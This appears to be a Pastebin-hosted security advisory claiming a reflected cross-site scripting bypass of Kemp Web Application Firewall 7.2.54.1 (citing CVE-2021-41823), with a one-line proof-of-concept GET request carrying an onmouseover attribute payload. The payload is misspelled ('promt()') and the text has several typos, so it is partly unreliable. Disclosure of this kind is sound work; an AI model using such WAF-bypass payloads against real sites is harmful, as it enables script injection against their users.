Advertisement
Guest User

Untitled

a guest
Dec 30th, 2022
4,235
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | Cybersecurity | 0 0
  1. 1. ADVISORY INFORMATION
  2. =======================
  3. Product: Kemp Web Application Firewall
  4. Vendor URL: https://kemptechnologies.com/en/solutions/waf
  5. Version: 7.2.54.1
  6. Type: Bypass XSS WAF prottection
  7. Date published: 2022-12-30
  8. CVE: CVE-2021-41823
  9.  
  10.  
  11. 2. VULNERABILITY DETAILS
  12. ========================
  13. The kemp waf allows to bypass xss protection and inyect the following xss reflected payload "onmouseover='promt()"
  14.  
  15. 3. PROOF OF CONCEPT
  16. ===================
  17. GET /directory/vulnerable-xss.html"onmouseover='promt()" HTTP/1.1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement